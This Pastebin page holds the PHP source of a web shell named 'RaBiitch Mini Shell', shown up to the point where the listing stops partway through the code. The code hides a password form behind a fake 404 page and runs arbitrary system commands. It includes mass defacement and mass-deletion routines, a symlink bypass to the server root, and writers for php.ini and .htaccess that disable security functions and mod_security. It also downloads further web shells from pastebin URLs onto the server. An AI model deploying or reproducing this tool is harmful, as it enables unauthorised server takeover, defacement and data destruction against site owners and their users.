rabyte

tes mini

Jul 12th, 2018
119
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 249.39 KB | None | 0 0
  1. <?php
  2. set_time_limit(0);
  3. error_reporting(0);
  4.  
  5. $auth_pass = "fec87ee2ce2db774f788b34564d2b1df";
  6. if(get_magic_quotes_gpc()) {
  7. function VEstripslashes($array) { return is_array($array) ? array_map('VEstripslashes', $array) : stripslashes($array); }
  8. $_POST = VEstripslashes($_POST);
  9. $_COOKIE = VEstripslashes($_COOKIE); }
  10.  
  11.  
  12. function Login() {
  13. die("
  14. <html><head><title>404 Not Found</title></head>
  15. <style>
  16. input { margin:0;background-color:#fff;border:1px solid #fff; }
  17. </style>
  18. <body>
  19. <h1>Not Found</h1>
  20. <p>The requested URL was not found on this server.</p><hr>
  21. <form method=post>
  22. <input type=password name=pass></form></body></html>");
  23. }
  24.  
  25. function VEsetcookie($k, $v) {
  26. $_COOKIE[$k] = $v;
  27. setcookie($k, $v);
  28. }
  29.  
  30. if(!empty($auth_pass)) {
  31. if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
  32. VEsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
  33.  
  34. if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
  35. Login();
  36. }
  37. ?>
  38. <!DOCTYPE HTML>
  39. <HTML>
  40. <HEAD>
  41. <link href="" rel="stylesheet" type="text/css">
  42. <title> RaBiitch Mini Shell </title>
  43. <style>
  44. body{
  45. background: #000000 url(https://3.bp.blogspot.com/-hXOUNi5bHk0/W0mEDXd7HSI/AAAAAAAAC2s/BJnpI1kdV1sZX4z-ioF7A3mb4pFx_ILdQCLcBGAs/s1600/hitam.jpg) scroll repeat center center;
  46. color:#fff;
  47. }
  48. li {
  49. display: inline;
  50. margin: 1px;
  51. padding: 1px;
  52. }
  53. table{
  54. border: 3px #840000 solid;
  55. }
  56. #content .first{
  57. background-color: #8d0000;
  58. }
  59. #menu a {
  60. padding:2px 10px;
  61. margin:0;
  62. background:#000000;
  63. text-decoration:none;
  64. letter-spacing:2px;
  65. padding: 2px 10px;
  66. margin: 0;
  67. background: #000000;
  68. text-decoration: none;
  69. letter-spacing: 2px;
  70. border-radius: 2px;
  71. border-bottom: 2px solid #ab0000;
  72. border-top: 2px solid #ab0000;
  73. border-right: 2px solid #ab0000;
  74. border-left: 2px solid #ab0000;
  75. }
  76. #menu a:hover {
  77. background:#408b1a;
  78. border-bottom:0px solid #000000;
  79. border-top:0px solid #000000;
  80. }
  81. a{
  82. color:#fff;
  83. text-decoration: none;
  84. }
  85. textarea{
  86. backgroud-color:#000000;
  87. color: #fff;
  88. background: black;
  89. }
  90. input,select{
  91. border: 1px #b91a00 solid;
  92. -moz-border-radius: 5px;
  93. -webkit-border-radius:5px;
  94. border-radius:5px;
  95. }
  96. </style>
  97. </HEAD>
  98.  
  99. <?php
  100. function w($dir,$perm) {
  101. if(!is_writable($dir)) {
  102. return "<font color=red>".$perm."</font>";
  103. } else {
  104. return "<font color=green>".$perm."</font>";
  105. }
  106. }
  107. function exe($cmd) {
  108. if(function_exists('system')) {
  109. @ob_start();
  110. @system($cmd);
  111. $buff = @ob_get_contents();
  112. @ob_end_clean();
  113. return $buff;
  114. } elseif(function_exists('exec')) {
  115. @exec($cmd,$results);
  116. $buff = "";
  117. foreach($results as $result) {
  118. $buff .= $result;
  119. } return $buff;
  120. } elseif(function_exists('passthru')) {
  121. @ob_start();
  122. @passthru($cmd);
  123. $buff = @ob_get_contents();
  124. @ob_end_clean();
  125. return $buff;
  126. } elseif(function_exists('shell_exec')) {
  127. $buff = @shell_exec($cmd);
  128. return $buff;
  129. }
  130. }
  131. function sulap($text) {
  132. if(!get_magic_quotes_gpc()) {
  133. return $text;
  134. }
  135. return stripslashes($text);
  136. }
  137. function ambilKata($param, $kata1, $kata2){
  138. if(strpos($param, $kata1) === FALSE) return FALSE;
  139. if(strpos($param, $kata2) === FALSE) return FALSE;
  140. $start = strpos($param, $kata1) + strlen($kata1);
  141. $end = strpos($param, $kata2, $start);
  142. $return = substr($param, $start, $end - $start);
  143. return $return;
  144. }
  145. function perms($file){
  146. $perms = fileperms($file);
  147. if (($perms & 0xC000) == 0xC000) {
  148. // Socket
  149. $info = 's';
  150. } elseif (($perms & 0xA000) == 0xA000) {
  151. // Symbolic Link
  152. $info = 'l';
  153. } elseif (($perms & 0x8000) == 0x8000) {
  154. // Regular
  155. $info = '-';
  156. } elseif (($perms & 0x6000) == 0x6000) {
  157. // Block special
  158. $info = 'b';
  159. } elseif (($perms & 0x4000) == 0x4000) {
  160. // Directory
  161. $info = 'd';
  162. } elseif (($perms & 0x2000) == 0x2000) {
  163. // Character special
  164. $info = 'c';
  165. } elseif (($perms & 0x1000) == 0x1000) {
  166. // FIFO pipe
  167. $info = 'p';
  168. } else {
  169. // Unknown
  170. $info = 'u';
  171. }
  172.  
  173. // Owner
  174. $info .= (($perms & 0x0100) ? 'r' : '-');
  175. $info .= (($perms & 0x0080) ? 'w' : '-');
  176. $info .= (($perms & 0x0040) ?
  177. (($perms & 0x0800) ? 's' : 'x' ) :
  178. (($perms & 0x0800) ? 'S' : '-'));
  179.  
  180. // Group
  181. $info .= (($perms & 0x0020) ? 'r' : '-');
  182. $info .= (($perms & 0x0010) ? 'w' : '-');
  183. $info .= (($perms & 0x0008) ?
  184. (($perms & 0x0400) ? 's' : 'x' ) :
  185. (($perms & 0x0400) ? 'S' : '-'));
  186.  
  187. // World
  188. $info .= (($perms & 0x0004) ? 'r' : '-');
  189. $info .= (($perms & 0x0002) ? 'w' : '-');
  190. $info .= (($perms & 0x0001) ?
  191. (($perms & 0x0200) ? 't' : 'x' ) :
  192. (($perms & 0x0200) ? 'T' : '-'));
  193.  
  194. return $info;
  195. }
  196. $_c7e = 'WGFpIFN5bmRpY2F0ZQ==';
  197. $sys = php_uname();
  198. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  199. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<font>ON</font>' : '<font>OFF</font>';
  200. $getds = @ini_get("disable_functions");
  201. $ds = (!empty($getds)) ? "<font>$ds</font>" : "<font>NONE</font>";
  202. if(isset($_GET['path'])){
  203. $path = $_GET['path'];
  204. }else{
  205. $path = getcwd();
  206. }
  207. $path = str_replace('\\','/',$path);
  208. $paths = explode('/',$path);
  209. $home_r = $_SERVER['DOCUMENT_ROOT'];
  210. $_COPY = base64_decode($_c7e);
  211. if(get_magic_quotes_gpc()){
  212. foreach($_POST as $key=>$value){
  213. $_POST[$key] = stripslashes($value);
  214. }
  215. }
  216. if($_POST['upload']) {
  217. if($_POST['tipe_upload'] == 'biasa') {
  218. if(@copy($_FILES['ix_file']['tmp_name'], "$path/".$_FILES['ix_file']['name']."")) {
  219. $act = "<font color=green>Uploaded!</font> at <i><b>$path/".$_FILES['ix_file']['name']."</b></i>";
  220. } else {
  221. $act = "<font color=red>Failed to upload file</font>";
  222. }
  223. } else {
  224. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  225. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  226. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  227. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  228. $act = "<font color=green>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  229. } else {
  230. $act = "<font color=red>Failed to upload file</font>";
  231. }
  232. } else {
  233. $act = "<font color=red>Failed to upload file</font>";
  234. }
  235. }
  236. }
  237. echo "<center>Uploader :
  238. <form method='post' enctype='multipart/form-data'>
  239. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($path,"Writeable")." ]
  240. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  241. <input type='file' name='ix_file'>
  242. <input type='submit' value='upload' name='upload'>
  243. </form>";
  244. echo $act;
  245. echo '<center>
  246. <table width="700" align="center">
  247. <center>
  248. <form method="get">
  249. <select name="shell">
  250. <option value="">Shell Creator</option>
  251. <option value="wso">WSO Shell</option>
  252. <option value="idx">IDX Shell</option>
  253. <option value="b374k">B374K Shell</option>
  254. <option value="r57">R57 Shell</option>
  255. <option value="b374k">b374k Shell</option>
  256. <option value="blackhat">BlackHat Shell</option>
  257. <option value="noname">Noname Shell</option>
  258. </select>
  259. <input type="submit" value=">">
  260. </form>
  261. </center>
  262. ';
  263. echo'
  264. <div id="menu">
  265. <center>
  266. <ul>
  267. <li><a href="?">Home</a></li>
  268. <li><a href="?path='.$path.'&RaBiitch=info">System Info</a></li>
  269. <li><a href="?path='.$path.'&RaBiitch=config">Config Grab</a></li>
  270. <li><a href="?path='.$path.'&RaBiitch=crkcp">Cp Crack</a></li>
  271. <li><a href="?path='.$path.'&RaBiitch=jumping">Loncat</a></li>
  272. <li><a href="?path='.$path.'&RaBiitch=symlink">Symlink</a></li>
  273. <li><a href="?path='.$path.'&RaBiitch=adminer">Adminer</a></li><br><br>
  274. <li><a href="?path='.$path.'&RaBiitch=network">BackConnect</a>
  275. <li><a href="?path='.$path.'&RaBiitch=mail">Mailer</a></li>
  276. <li><a href="?path='.$path.'&RaBiitch=edituser">Auto Edit User</a></li>
  277. <li><a href="?path='.$path.'&RaBiitch=zoneh">Zone-H</a></li>
  278. <li><a href="?path='.$path.'&RaBiitch=defid">Defacer.id</a></li>
  279. <li><a href="?path='.$path.'&RaBiitch=symconfig">SymConfig</a></li><br><br>
  280. <li><a href="?path='.$path.'&RaBiitch=disablefunc">Disable Functions</a></li>
  281. <li><a href="?path='.$path.'&RaBiitch=domains">Domain Views</a></li>
  282. <li><a href="?path='.$path.'&RaBiitch=hashid">Hash ID</a></li>
  283. <li><a href="?path='.$path.'&RaBiitch=bing">Bing Grab</a></li>
  284. <li><a href="?path='.$path.'&RaBiitch=mass_deface">Mass Tools</a></li><br><br>
  285. <li><a href="?path='.$path.'&RaBiitch=cmd">Command</a></li>
  286. <li><a href="?path='.$path.'&RaBiitch=csrfup">Csrf Exploiter</a></li>
  287. <li><a href="?path='.$path.'&RaBiitch=vhost">Bypass Vhost</a></li>
  288. <li><a href="?path='.$path.'&RaBiitch=logs">Pengaman Bro</a></li>
  289. <li><a href="?path='.$path.'&RaBiitch=kill">Kill Your Self</a></li>
  290. </ul></center></div>';
  291. echo '
  292. <br>
  293. <table width="700" align="center">
  294. <tr><td><font color="white">Current Path :</font>';
  295. foreach($paths as $id=>$pat){
  296. if($pat == '' && $id == 0){
  297. $a = true;
  298. echo '<a href="?path=/">/</a>';
  299. continue;
  300. }
  301. if($pat == '') continue;
  302. echo '<a href="?path=';
  303. for($i=0;$i<=$id;$i++){
  304. echo "$paths[$i]";
  305. if($i != $id) echo "/";
  306. }
  307. echo '">'.$pat.'</a>/';
  308. }
  309. echo '</td></tr>';
  310. echo '</table>';
  311. if($_GET['RaBiitch'] == 'logout') {
  312. echo '<form action="?patch='.$path.'&do=logout" method="post">';
  313. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  314. echo 'Good Bye!!';
  315. } elseif($_GET['RaBiitch'] == 'cmd') {
  316. echo "<br><fieldset>";
  317. echo "<form method='post'>
  318. <font style='text-decoration: underline;'>Command : </font>
  319. <input type='text' size='30' height='10' name='command'><input type='submit' name='c7ecmd' value='>>'>
  320. </form> ";
  321. if(isset($_POST['c7ecmd']))
  322. {
  323.  
  324. echo'<br><div style="background:#6d6d6d;margin:0px;padding:1px;text-align:left;color:lime;"><pre>';
  325. $cmd = $_POST['command'];
  326. if($cmd == "")
  327. {
  328.  
  329. echo "Please Insert Command!";
  330. }
  331.  
  332. elseif(isset($cmd))
  333. {
  334. $output = exe($cmd);
  335. echo $output; }
  336. echo'</pre></div><br><br>';
  337. }
  338. echo "</fieldset><br>";
  339. }elseif($_GET['RaBiitch'] == 'mass_deface') {
  340. echo "<center><form action=\"\" method=\"post\">\n";
  341. $dirr=$_POST['d_dir'];
  342. $index = $_POST["script"];
  343. $index = str_replace('"',"'",$index);
  344. $index = stripslashes($index);
  345. function edit_file($file,$index){
  346. if (is_writable($file)) {
  347. clear_fill($file,$index);
  348. echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  349. }
  350. else {
  351. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  352. }
  353. }
  354. function hapus_massal($dir,$namafile) {
  355. if(is_writable($dir)) {
  356. $dira = scandir($dir);
  357. foreach($dira as $dirb) {
  358. $dirc = "$dir/$dirb";
  359. $lokasi = $dirc.'/'.$namafile;
  360. if($dirb === '.') {
  361. if(file_exists("$dir/$namafile")) {
  362. unlink("$dir/$namafile");
  363. }
  364. } elseif($dirb === '..') {
  365. if(file_exists("".dirname($dir)."/$namafile")) {
  366. unlink("".dirname($dir)."/$namafile");
  367. }
  368. } else {
  369. if(is_dir($dirc)) {
  370. if(is_writable($dirc)) {
  371. if(file_exists($lokasi)) {
  372. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  373. unlink($lokasi);
  374. $idx = hapus_massal($dirc,$namafile);
  375. }
  376. }
  377. }
  378. }
  379. }
  380. }
  381. }
  382. function clear_fill($file,$index){
  383. if(file_exists($file)){
  384. $handle = fopen($file,'w');
  385. fwrite($handle,'');
  386. fwrite($handle,$index);
  387. fclose($handle); } }
  388.  
  389. function gass(){
  390. global $dirr , $index ;
  391. chdir($dirr);
  392. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  393. $files = scandir($dirr) ;
  394. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  395. sort($files);
  396. $n = 0 ;
  397. foreach ($files as $file){
  398. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  399. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  400. edit_file($file,$index);
  401. flush();
  402. $n = $n +1 ;
  403. }
  404. }
  405. echo "<br>";
  406. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
  407. }
  408. function ListFiles($dirrall) {
  409.  
  410. if($dh = opendir($dirrall)) {
  411.  
  412. $files = Array();
  413. $inner_files = Array();
  414. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  415. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  416. while($file = readdir($dh)) {
  417. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  418. if(is_dir($dirrall . "/" . $file)) {
  419. $inner_files = ListFiles($dirrall . "/" . $file);
  420. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  421. } else {
  422. array_push($files, $dirrall . "/" . $file);
  423. }
  424. }
  425. }
  426.  
  427. closedir($dh);
  428. return $files;
  429. }
  430. }
  431. function gass_all(){
  432. global $index ;
  433. $dirrall=$_POST['d_dir'];
  434. foreach (ListFiles($dirrall) as $key=>$file){
  435. $file = str_replace('//',"/",$file);
  436. echo "<center><strong>$file</strong> ===>";
  437. edit_file($file,$index);
  438. flush();
  439. }
  440. $key = $key+1;
  441. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
  442. function sabun_massal($dir,$namafile,$isi_script) {
  443. if(is_writable($dir)) {
  444. $dira = scandir($dir);
  445. foreach($dira as $dirb) {
  446. $dirc = "$dir/$dirb";
  447. $lokasi = $dirc.'/'.$namafile;
  448. if($dirb === '.') {
  449. file_put_contents($lokasi, $isi_script);
  450. } elseif($dirb === '..') {
  451. file_put_contents($lokasi, $isi_script);
  452. } else {
  453. if(is_dir($dirc)) {
  454. if(is_writable($dirc)) {
  455. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  456. file_put_contents($lokasi, $isi_script);
  457. $idx = sabun_massal($dirc,$namafile,$isi_script);
  458. }
  459. }
  460. }
  461. }
  462. }
  463. }
  464. if($_POST['mass'] == 'onedir') {
  465. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  466. $ini="http://";
  467. $mainpath=$_POST[d_dir];
  468. $file=$_POST[d_file];
  469. $dir=opendir("$mainpath");
  470. $code=base64_encode($_POST[script]);
  471. $indx=base64_decode($code);
  472. while($row=readdir($dir)){
  473. $start=@fopen("$row/$file","w+");
  474. $finish=@fwrite($start,$indx);
  475. if ($finish){
  476. echo"$ini$row/$file\n";
  477. }
  478. }
  479. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  480. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  481. $dir=opendir("$mainpath");
  482. $code=base64_encode($_POST[script]);
  483. $indx=base64_decode($code);
  484. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  485. $finish=@fwrite($start,$indx);
  486. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  487. }
  488.  
  489. }
  490. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  491. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  492. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  493. elseif($_POST['mass'] == 'massdeface') {
  494. echo "<div style='margin: 5px auto; padding: 5px'>";
  495. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  496. echo "</div>"; }
  497. else {
  498. echo "
  499. <center><font style='text-decoration: underline;'>
  500. Select Type:<br>
  501. </font>
  502. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
  503. <option value=\"onedir\">Mass Deface 1 Dir</option>
  504. <option value=\"massdeface\">Mass Deface ALL Dir</option>
  505. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  506. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  507. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  508. <font style='text-decoration: underline;'>Folder:</font><br>
  509. <input type='text' name='d_dir' value='$path' style='width: 450px;' height='10'><br>
  510. <font style='text-decoration: underline;'>Filename:</font><br>
  511. <input type='text' name='d_file' value='dc.php' style='width: 450px;' height='10'><br>
  512. <font style='text-decoration: underline;'>Index File:</font><br>
  513. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By ./RaBiitch</textarea><br>
  514. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  515. </form></center>";
  516. }
  517. } elseif($_GET['RaBiitch'] == 'vhost') {
  518. echo "<form method='POST' action=''>";
  519. echo "<center><br><font size='6'>Bypass Symlink vHost</font><br><br>";
  520. echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
  521. if (isset($_POST['Colii'])){ system('ln -s / Rintoar.txt');
  522. $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';
  523. $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","Rintoar.txt");
  524. $rt="<br><a href=Rintoar.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>
  525. Bypassed Successfully</b></font></a>";
  526. echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt</center>";} echo "</form>";
  527. } elseif($_GET['RaBiitch'] == 'csrfup')
  528. {
  529. echo '<html>
  530. <center><h1 style="font-size:33px;">CSRF Exploiter By IndoXPloit<br>Recoded by Rinto AR</h1><br><br>
  531. <font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
  532. <br><br>
  533. <form method="post" style="font-size:25px;">
  534. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  535. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  536. <input type="submit" name="d" value="Lock!">
  537. </form>';
  538. $url = $_POST["url"];
  539. $pf = $_POST["pf"];
  540. $d = $_POST["d"];
  541. if($d) {
  542. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form></form>
  543. </html>";
  544. }
  545. } elseif($_GET['RaBiitch'] == 'hashid') {
  546. if (isset($_POST['gethash'])) {
  547. $hash = $_POST['hash'];
  548. if (strlen($hash) == 32) {
  549. $hashresult = "MD5 Hash";
  550. } elseif (strlen($hash) == 40) {
  551. $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  552. } elseif (strlen($hash) == 13) {
  553. $hashresult = "DES(Unix) Hash";
  554. } elseif (strlen($hash) == 16) {
  555. $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  556. } elseif (strlen($hash) == 41) {
  557. $GetHashChar = substr($hash, 40);
  558. if ($GetHashChar == "*") {
  559. $hashresult = "MySQL5 Hash";
  560. }
  561. } elseif (strlen($hash) == 64) {
  562. $hashresult = "SHA-256 Hash";
  563. } elseif (strlen($hash) == 96) {
  564. $hashresult = "SHA-384 Hash";
  565. } elseif (strlen($hash) == 128) {
  566. $hashresult = "SHA-512 Hash";
  567. } elseif (strlen($hash) == 34) {
  568. if (strstr($hash, '$1$')) {
  569. $hashresult = "MD5(Unix) Hash";
  570. }
  571. } elseif (strlen($hash) == 37) {
  572. if (strstr($hash, '$apr1$')) {
  573. $hashresult = "MD5(APR) Hash";
  574. }
  575. } elseif (strlen($hash) == 34) {
  576. if (strstr($hash, '$H$')) {
  577. $hashresult = "MD5(phpBB3) Hash";
  578. }
  579. } elseif (strlen($hash) == 34) {
  580. if (strstr($hash, '$P$')) {
  581. $hashresult = "MD5(Wordpress) Hash";
  582. }
  583. } elseif (strlen($hash) == 39) {
  584. if (strstr($hash, '$5$')) {
  585. $hashresult = "SHA-256(Unix) Hash";
  586. }
  587. } elseif (strlen($hash) == 39) {
  588. if (strstr($hash, '$6$')) {
  589. $hashresult = "SHA-512(Unix) Hash";
  590. }
  591. } elseif (strlen($hash) == 24) {
  592. if (strstr($hash, '==')) {
  593. $hashresult = "MD5(Base-64) Hash";
  594. }
  595. } else {
  596. $hashresult = "Hash type not found";
  597. }
  598. } else {
  599. $hashresult = "Not Hash Entered";
  600. }
  601. ?>
  602. <center><br><Br><br>
  603.  
  604. <form action="" method="POST">
  605. <tr>
  606. <table >
  607. <th colspan="5">Hash Identification</th>
  608. <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td> <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
  609. <tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
  610. </table></tr></form>
  611. </center>
  612. <?php
  613. } elseif($_GET['RaBiitch'] == 'domains'){echo "<center><div class='mybox'><p align='center' class='cgx2'>Domains and Users</p>";$d0mains = @file("/etc/named.conf");if(!$d0mains){die("<center>Error : can't read [ /etc/named.conf ]</center>");}echo '<table id="output"><tr bgcolor=#cecece><td>Domains</td><td>users</td></tr>';foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>";flush();}}}echo'</div></center>';
  614. } elseif($_GET['RaBiitch'] == 'disablefunc'){
  615. echo "<center>";
  616. echo "<form method=post><input type=submit name=ini value='php.ini' />&nbsp;<input type=submit name=htce value='.htaccess' /></form>";
  617. if(isset($_POST['ini']))
  618. {
  619. $file = fopen("php.ini","w");
  620. echo fwrite($file,"disable_functions=none
  621. safe_mode = Off
  622. ");
  623. fclose($file);
  624. echo "<a href='php.ini'>click here!</a>";
  625. } if(isset($_POST['htce']))
  626. {
  627. $file = fopen(".htaccess","w");
  628. echo fwrite($file,"<IfModule mod_security.c>
  629. SecFilterEngine Off
  630. SecFilterScanPOST Off
  631. </IfModule>
  632. ");
  633. fclose($file);
  634. echo "htaccess successfully created!";
  635. }
  636. echo"</center>";
  637. }elseif($_GET['shell'] == 'wso'){
  638. $tools_dir = mkdir('RaBiitch_tools', 0755);
  639. $file_tools = "RaBiitch_tools/wso.php";
  640. $isi_httools = "<IfModule mod_security.c>
  641. SecFilterEngine Off
  642. SecFilterScanPOST Off
  643. </IfModule>";
  644. $httools = fopen(".htaccess", "w");
  645. $tools_script = file_get_contents("http://pastebin.com/raw.php?i=N0eh3Q7Y");
  646. $tools = fopen($file_tools, "w");
  647. fwrite($tools, $tools_script);
  648. fwrite($httools, $isi_httools);
  649. chmod($file_tools, 0755);
  650. echo "Done <a href='RaBiitch_tools/wso.php'>WSO Shell Here</a>";
  651. }
  652. elseif($_GET['shell'] == 'idx'){
  653. $tools2_dir = mkdir('RaBiitch_tools', 0755);
  654. $file_tools2 = "RaBiitch_tools/idx.php";
  655. $isi_httools2 = "<IfModule mod_security.c>
  656. SecFilterEngine Off
  657. SecFilterScanPOST Off
  658. </IfModule>";
  659. $httools2 = fopen(".htaccess", "w");
  660. $tools2_script = file_get_contents("http://pastebin.com/raw.php?i=nC6pWh5a");
  661. $tools2 = fopen($file_tools2, "w");
  662. fwrite($tools2, $tools2_script);
  663. fwrite($httools2, $isi_httools2);
  664. chmod($file_tools2, 0755);
  665. echo "Done <a href='RaBiitch_tools/idx.php'>Idx Shell Here</a>";
  666. }
  667. elseif($_GET['shell'] == 'b374k'){
  668. $tools3_dir = mkdir('RaBiitch_tools', 0755);
  669. $file_tools3 = "RaBiitch_tools/b374k.php";
  670. $isi_httools3 = "<IfModule mod_security.c>
  671. SecFilterEngine Off
  672. SecFilterScanPOST Off
  673. </IfModule>";
  674. $httools3 = fopen(".htaccess", "w");
  675. $tools3_script = file_get_contents("http://pastebin.com/raw.php?i=cR71LiMp");
  676. $tools3 = fopen($file_tools3, "w");
  677. fwrite($tools3, $tools3_script);
  678. fwrite($httools3, $isi_httools3);
  679. chmod($file_tools3, 0755);
  680. echo "Done <a href='RaBiitch_tools/b374k.php'>b374k Shell Here</a>";
  681. }
  682. elseif($_GET['shell'] == 'sadrazam'){
  683. $tools4_dir = mkdir('RaBiitch_tools', 0755);
  684. $file_tools4 = "RaBiitch_tools/sadrazam.php";
  685. $isi_httools4 = "<IfModule mod_security.c>
  686. SecFilterEngine Off
  687. SecFilterScanPOST Off
  688. </IfModule>";
  689. $httools4 = fopen(".htaccess", "w");
  690. $tools4_script = file_get_contents("http://pastebin.com/raw.php?i=xjKrnnBD");
  691. $tools4 = fopen($file_tools4, "w");
  692. fwrite($tools4, $tools4_script);
  693. fwrite($httools4, $isi_httools4);
  694. chmod($file_tools4, 0755);
  695. echo "Done <a href='RaBiitch_tools/sadrazam.php'>Sadrazam Shell Here</a>";
  696. }
  697. elseif($_GET['shell'] == 'blackhat'){
  698. $tools5_dir = mkdir('RaBiitch_tools', 0755);
  699. $file_tools5 = "RaBiitch_tools/bh.php";
  700. $isi_httools5 = "<IfModule mod_security.c>
  701. SecFilterEngine Off
  702. SecFilterScanPOST Off
  703. </IfModule>";
  704. $httools5 = fopen(".htaccess", "w");
  705. $tools5_script = file_get_contents("http://pastebin.com/raw.php?i=3L2ESWeu");
  706. $tools5 = fopen($file_tools5, "w");
  707. fwrite($tools5, $tools5_script);
  708. fwrite($httools5, $isi_httools5);
  709. chmod($file_tools5, 0755);
  710. echo "Done <a href='RaBiitch_tools/bh.php'>Black Hat Shell Here</a>";
  711. }
  712. elseif($_GET['shell'] == 'r57'){
  713. $tools6_dir = mkdir('RaBiitch_tools', 0755);
  714. $file_tools6 = "RaBiitch_tools/r57.php";
  715. $isi_httools6 = "<IfModule mod_security.c>
  716. SecFilterEngine Off
  717. SecFilterScanPOST Off
  718. </IfModule>";
  719. $httools6 = fopen(".htaccess", "w");
  720. $tools6_script = file_get_contents("http://pastebin.com/raw.php?i=G2VEDunW");
  721. $tools6 = fopen($file_tools6, "w");
  722. fwrite($tools6, $tools6_script);
  723. fwrite($httools6, $isi_httools6);
  724. chmod($file_tools6, 0755);
  725. echo "Done <a href='RaBiitch_tools/r57.php'>R57 Shell Here</a>";
  726. }
  727. elseif($_GET['shell'] == 'noname'){
  728. $tools7_dir = mkdir('RaBiitch_tools', 0755);
  729. $file_tools7 = "RaBiitch_tools/noname.php";
  730. $isi_httools7 = "<IfModule mod_security.c>
  731. SecFilterEngine Off
  732. SecFilterScanPOST Off
  733. </IfModule>";
  734. $httools7 = fopen(".htaccess", "w");
  735. $tools7_script = file_get_contents("http://pastebin.com/raw.php?i=BRCmf02c");
  736. $tools7 = fopen($file_tools7, "w");
  737. fwrite($tools7, $tools7_script);
  738. fwrite($httools7, $isi_httools7);
  739. chmod($file_tools7, 0755);
